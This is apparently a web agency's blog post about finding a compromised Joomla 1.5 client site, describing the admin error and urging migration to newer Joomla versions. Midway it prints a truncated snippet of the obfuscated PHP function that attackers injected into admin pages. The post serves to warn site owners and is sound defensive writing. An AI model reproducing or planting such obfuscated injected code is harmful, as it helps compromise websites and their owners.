Hacked Joomla Websites are on the rise! Since Joomla 1.5 reached End of Life on April 11, 2012 we are seeing more and more instances of plundered and violated websites appearing.

While drafting up a proposal for a client migration I ran an audit on their current site. I was planning to make a note of all extensions installed and point out which, if any, were at risk. Much to my surprise I discovered that the admin did not function and instead received the following php error (the full path has been edited for anonymity):

Fatal error: Cannot redeclare XTW6QUo() (previously declared in /path/administrator/index.php:188) in /path/administrator/templates/khepri/index.php on line 223

We currently have a large amount of hosted clients (somewhere around 120 clients). Most of these have selected to host with ourselves for peace of mind. Some have also taken out a support contract to ensure their website is looked after. This particular client has no support package in place and is hosted elsewhere.

3rd Party Hosting

Some clients come to us and are already hosted with a 3rd Party. We don’t like 3rd parties. We have no experience with these hosts so cannot vouch for them.  We host with Heart Internet and know what they run. We trust their knowledge and rely on their support. If you host your site with a different host it complicates matters. Especially when they will not let us contact them on your behalf.

This client was hosted with another host; a rather large, well-know host. A host we have had dealings with these guys in the past and found their servers and conduct very poor. They will remain anonymous…

The hack

Unable to condut my audit I took a backup of the site via FTP to examine the files.

The site was running the final release of Joomla version 1.5.26. It is most likely that one of the extensions installed was the cause of the exploit. As I do not have access to the server logs I cannot guess when the hack took place or what it is actually doing.

The malicous code

Inserted at the bottom of countless admin pages is some kind of php function. I have not included the full code.

<?php /*16*/ function XTW6QUo($efAyyetq){$aff=array(0,97,98,99,100,101,108,115,118,105,110,111,117,109,112,114);$stf='';$efAYytetq=0;while($efAYytetq<8){if($aff[$efAyyetq-(($efAyyetq>>4)<<4)]){$stf.=chr($aff[$efAyyetq-(($efAyyetq>>4)<<4)]);}$efAyyetq=$efAyyetq>>4;$efAYytetq++;}return$stf;}$_________=XTW6QUo(24965);$_________ ...

Where does the client stand?

I have previously posted about recovering from an iframe Joomla hack. There are a large number of posts out there covering what to do in case you have been exploited or defaced:  http://docs.joomla.org/Security_Checklist_7.

Fortunately I have a backup of the site from 3 months prior when we were contracted to perform some remedial work. I am, however, dubious about restoring the site on the existing host as I fear it will only be exploited again. We would charge the client a nominal rate for the data recovery and restore but this would most likely only be a short term fix.

The ideal solution

Fixing this Joomla hack would require the site to be cleaned and then migrated to the latest supported release. This would be done on a localhost to avoid the site being publically visible.

Even if we were to restore this site from a clean backup there is no guarantee that it will not be compromised again. The safest route is to go with a clean install of Joomla 2.5.x or 3.1.x.

What version of Joomla should you use?

http://docs.joomla.org/What_version_of_Joomla!_should_you_use%3F

All users are advised to either migrate to version 2.5.x (the current long-term support release) or to version 3.1.x the latest (short term release).

Version 3.1 is stable enough for production sites and is recommended unless you need any functionality that is only available on the 2.5.x platform. See the development status here: http://developer.joomla.org/development-status.html

How long is each version supported?

Extract taken from: http://docs.joomla.org/Joomla_3_FAQ

The 3.x series will have over 4 years of support as well. This of course is taking into account all the STS versions, 3.0 to 3.1 then 3.2 which will only have 7 months of support each, followed by last version, 3.5. The final version of the 3.x series will be Joomla! 3.5, an LTS version, planned for release in March of 2014 with support until the end of 2016. All of the Joomla! 3.x versions will be one-click upgrades and should, overall, be smooth transitions for users and developers as the 2.x series was.

Essentially what this is saying is that the newer platforms are far less painful to update than on the older 1.5.x platform. The new platforms include an automatic updater.

As long as there are no heavy customisations made to the coding of the site future updates could (in theory) be done by anyone with admin privileges.

Conclusion

In summary this has shown that it is better to plan for the worst scenario rather then wait for the inevitable. No software is infallible. Without regular security patches your site will eventually fall foul of some newly discovered exploit.

Website security has been highlighted in the press recently due to large organised attacked. The BBC report on the WordPress botnet in April (http://www.bbc.co.uk/news/technology-22152296), a botnet that also went on to target other CMS based sites.

If you are still stuck on an older version of Joomla and have not yet decided to go ahead with the migration of your Joomla 1.5.x site we want to ask you this question:

Your data is your business. Just how much is it worth to you?